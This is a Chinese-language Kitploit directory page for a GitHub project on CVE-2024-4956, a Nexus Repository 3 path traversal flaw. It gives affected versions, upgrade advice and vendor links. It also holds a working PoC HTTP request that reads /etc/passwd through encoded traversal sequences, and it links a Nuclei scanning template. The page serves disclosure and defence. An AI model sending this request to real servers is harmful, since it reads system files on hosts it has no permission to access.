Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-4956 — Nexus Repository 3 中的未认证路径遍历漏洞 | Kitploit
工具/GitHubGitHub/erickfernandox/cve-2024-4956
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHuberickfernandox/cve-2024-4956

CVE-2024-4956

Nexus Repository 3 中的未认证路径遍历漏洞

查看仓库
32年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-4956 - Nexus Repository Manager 3 中的未认证路径遍历漏洞

Nexus Repository Manager 是一个仓库管理器,用于组织、存储和分发开发所需的工件。

在 Nexus Repository 3 的 3.68.1 之前的版本中发现了一个路径遍历漏洞。该漏洞允许攻击者构造一个 URL,无需任何认证即可下载 Nexus Repository 应用程序范围之外的系统文件。这带来了重大风险,因为它可能暴露敏感的系统文件,并可能危及安装了 Nexus Repository 的环境的安全。

建议尽快将 Nexus Repository 更新到 3.68.1 或更高版本以缓解此漏洞。

有关该漏洞的更多信息和技术细节,请参考以下链接:

参考:

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

受影响版本

该漏洞影响 Sonatype Nexus Repository Manager 的 3.0 到 3.68.0 版本。

缓解措施:

升级 Nexus Repository 是消除此漏洞的推荐方法。但对于无法立即升级的部署,有可用的即时缓解选项:

参考:

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

PoC

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

通过上述 PoC,可以看到 /etc/passwd 文件被访问:

Nuclei 模板

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

下载工具